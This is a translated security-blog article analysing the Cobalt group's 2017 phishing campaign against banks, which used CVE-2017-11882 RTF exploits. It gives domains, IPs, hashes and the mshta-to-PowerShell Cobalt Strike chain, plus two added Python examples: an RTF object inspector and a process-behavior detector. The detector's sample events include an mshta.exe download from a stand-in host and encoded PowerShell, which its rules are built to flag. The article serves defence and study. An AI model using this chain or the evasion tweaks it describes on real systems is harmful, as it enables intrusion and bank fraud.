When hackers are faster than antiviruses

    FinCERT, the Central Bank's division for information security, in its latest report named the Cobalt group the main threat to banks and its attacks the main trend. Cobalt is indeed one of the most active and aggressive criminal groups today. Over one year, by experts' count, it carried out at least 50 successful attacks around the world, constantly testing new tools and changing attack vectors and targets. Besides contactless attacks on ATMs, Cobalt is trying to gain access to interbank transfer systems (SWIFT), payment gateways and card processing. In this article we show why traditional protection tools cannot defend against attacks by such groups, and what to do to protect your business from financial and reputational losses.

    Text: Andrey Zosimov, virus analyst.

    On November 14, 2017, specialists from Embedi published a technical report on the vulnerability CVE-2017-11882 and demonstrated it in various versions of Microsoft Office products. The vulnerability allows arbitrary code execution, including downloading executable files and running them. It has existed since 2000, when the vulnerable Microsoft Equation component, or more precisely “EQNEDT32.EXE”, was created. This component allows mathematical formulas to be embedded in Office documents using OLE technology. With the release of Office 2007 the component was updated, but support for the old version was kept for compatibility with old documents. So the vulnerability has existed for 17 years.

    The CVE itself was registered on July 31, 2017, and a few days later Embedi's specialists reported it to Microsoft. The final patch from Microsoft was released only on November 14, 2017.

    Three days ago, on November 21, a proof of concept for this vulnerability (https://github.com/embedi/CVE-2017-11882), together with a Python script that lets anyone build their own malicious “.rtf” document, was published in Embedi's public GitHub repository.

    First activity

    A few hours later, the Cobalt hacker group began a mass mailing of phishing emails to financial institutions, carrying a malicious document that anti-virus solutions could not detect:

    image

    The mailing carried a malicious document named “Changes to the rules for making transfers”.

    image

    The domain cards-cbr.ru, from which this letter was sent, was registered on the day of the mailing, 2017-11-21. It had the IP address 104.254.99.77.

    The following letter, with an empty body, was also distributed.

    Technical headers:

    image

    As we can see, the antivirus solution missed the malicious email, and as a result the malicious attachment reached a bank employee.
    Our TDS Polygon system successfully detected the attack with a verdict of 92%, and a CERT Group-IB employee informed the client about the situation:

    image

    The detected malicious document (MD5 F360D41A0B42B129F7F0C29F98381416) was uploaded to VirusTotal on 2017-11-21 13:27:59 (UTC), and at that time it was detected only by Rising antivirus, as “Exploit.CVE-2017-11882.Gen!1.AED3 (CLASSIC)”. It contained and executed the following command:

    image

    Judging by the structure of the file, it was clearly built with the published Python script. A few hours later, other anti-virus solutions began to identify the file as malicious, but the attackers responded immediately: they altered the exploit so that it once again went undetected by many popular antiviruses (MD5 8993F927BEAF8DAA02BB792C86C2B5E0):

    image

    image

    The domain name swift-alliance.com was originally created and registered by someone else on 2016-08-24, but it expired on 2017-08-24; the Cobalt criminals tracked this and registered the domain name themselves on 2017-11-21. Now the domain name “swift-alliance.com” shares an IP address with the domain “cards-cbr.ru”, which was used in the earlier mailing. At the moment (2017-11-22) all these domains have the IP address 139.59.89.20, and before 2017-11-21 they had the IP address 104.254.99.67:

    image

    Both variants had the same payload chain: the payload was loaded from the IP address “138.68.234.128”, which distributes Cobalt Strike. In the second case an HTA file was loaded and executed via the mshta.exe program:

    image

    The downloaded file contains obfuscated JavaScript, which ultimately executes an encoded PowerShell script:

    image

    As a result of this code, a PowerShell script is downloaded from the remote host “http://104.254.99.77/out.ps1” and then executed. The downloaded PowerShell script contains two encoded Beacons, which are launched according to the bitness of the OS.

    Changes

    The modified document is not very different from the original, but there are differences. First, the headers of the RTF document were changed:

    image

    As you can see, the keyword “objclass”, which is optional, was removed from the object's header:

    image

    The object name was changed from “Equation.3” to “1NYMiqIGRD”. Also, in the original version the space after the shellcode was padded with the letter “A”, whereas in the modified exploit the remaining space is filled with spaces:

    image

    The signatures (marked in red) before and after the shellcode are unchanged. In essence, the main changes were made to the headers of the RTF document and of the embedded object, including at the end:

    image

    Here the attackers simply changed the picture parameters and added a few of their own, which essentially affect nothing:

    “picwgoal” and “pichgoal” set the width and height of the picture in twips;

    “picw” and “pich” set the width and height of the picture in pixels;

    “picscale” sets the image scaling.
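    The structural changes above (object name, missing objclass, padding byte, extra picture controls) are what defeated signature matching. The following added example, not code from the article, inspects constructed RTF fragments modelled on the two variants and keys only on the presence of an embedded OLE object; the hex object data is a placeholder, not exploit content.

```python
import re

# Constructed fragments: one shaped like the original document, one like the modified one.
ORIGINAL_LIKE = r"{\rtf1{\object\objemb{\*\objclass Equation.3}{\*\objdata 01050000020000000b}}}"
MODIFIED_LIKE = (r"{\rtf1{\object\objemb\picw100\pich100\picwgoal1500\pichgoal1500\picscale100"
                 r"{\* 1NYMiqIGRD}{\*\objdata 01050000020000000b}}}")
BENIGN = r"{\rtf1 Changes to the rules for making transfers.}"

RISKY_CLASSES = {"equation.3"}  # ProgID served by EQNEDT32.EXE, the CVE-2017-11882 target


def rtf_groups(text, control):
    """Yield every brace-balanced {\\control ...} group found in the RTF text."""
    for m in re.finditer(r"\{\\" + control + r"\b", text):
        depth = 0
        for i in range(m.start(), len(text)):
            if text[i] == "{":
                depth += 1
            elif text[i] == "}":
                depth -= 1
                if depth == 0:
                    yield text[m.start():i + 1]
                    break


def inspect_object(group):
    """Pull out the object class (may be absent), whether object data exists, and picture controls."""
    cls = re.search(r"\\objclass\s+([^\s\\{}]+)", group)
    return {
        "objclass": cls.group(1) if cls else None,
        "has_objdata": re.search(r"\\objdata\b", group) is not None,
        "pic_controls": re.findall(r"\\(pic(?:wgoal|hgoal|scale|w|h))-?\d+", group),
    }


def findings(rtf):
    """Flag embedded OLE objects regardless of name, padding or cosmetic picture controls."""
    out = []
    for group in rtf_groups(rtf, "object"):
        info = inspect_object(group)
        if not info["has_objdata"]:
            continue
        if info["objclass"] is None:
            out.append("OLE object with no \\objclass")
        elif info["objclass"].lower() in RISKY_CLASSES:
            out.append(f"OLE object of class {info['objclass']}")
        else:
            out.append(f"OLE object of unexpected class {info['objclass']}")
    return out
```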

    And here is the conclusion: it was enough to change the document slightly, and anti-virus solutions were powerless against the attack.

    What could be the way out of this situation? Threat intelligence makes it possible to keep abreast of the attacks carried out by hacker groups, and to have at hand traffic analysis systems and sandboxes that deliver verdicts on malicious files not on the basis of signatures, but through behavioral analysis and an accumulated knowledge base of the characteristic behavior of each hacker group.
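    As an added example (not the article's or Group-IB's code) of the behavioral approach just described, the toy detector below evaluates process-creation events instead of file hashes: it flags EQNEDT32.EXE spawning a child, PowerShell descending from mshta.exe, and hidden or encoded PowerShell of the kind that fetched out.ps1. The events are constructed; the HTA URL and the base64 blob are placeholders.

```python
# Constructed process-creation events shaped like the chain described in the article.
EVENTS = [
    {"pid": 10, "ppid": 1,  "image": "svchost.exe",    "cmdline": "svchost.exe -k DcomLaunch"},
    {"pid": 20, "ppid": 10, "image": "EQNEDT32.EXE",   "cmdline": "EQNEDT32.EXE -Embedding"},
    {"pid": 30, "ppid": 20, "image": "mshta.exe",      "cmdline": "mshta.exe http://c2.example.invalid/stage.hta"},
    {"pid": 40, "ppid": 30, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUJDRA=="},
    # Benign activity: an interactive PowerShell job started from the desktop.
    {"pid": 50, "ppid": 1,  "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 60, "ppid": 50, "image": "powershell.exe", "cmdline": "powershell.exe -File backup.ps1"},
]


def ancestry(events, pid):
    """Return [self, parent, grandparent, ...] image names (lower-cased) for a pid."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Apply three behavioral rules; returns (rule, pid) pairs in event order."""
    alerts = []
    for e in events:
        chain = ancestry(events, e["pid"])
        image, parents = chain[0], chain[1:]
        cmd = e["cmdline"].lower()
        # Rule 1: the Equation Editor has no business launching child processes.
        if parents and parents[0] == "eqnedt32.exe":
            alerts.append(("eqnedt32_child", e["pid"]))
        # Rule 2: PowerShell with an HTA host (mshta.exe) anywhere in its ancestry.
        if image == "powershell.exe" and "mshta.exe" in parents:
            alerts.append(("mshta_to_powershell", e["pid"]))
        # Rule 3: hidden-window or encoded PowerShell, the shape of the downloader stage.
        if image == "powershell.exe" and any(
                flag in cmd for flag in (" -enc", " -encodedcommand", " -w hidden")):
            alerts.append(("encoded_powershell", e["pid"]))
    return alerts
```

    None of these rules depend on the document's hash, object name or padding, so the modified exploit trips them exactly as the original did.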

    Read the full version on the Group-IB Blog
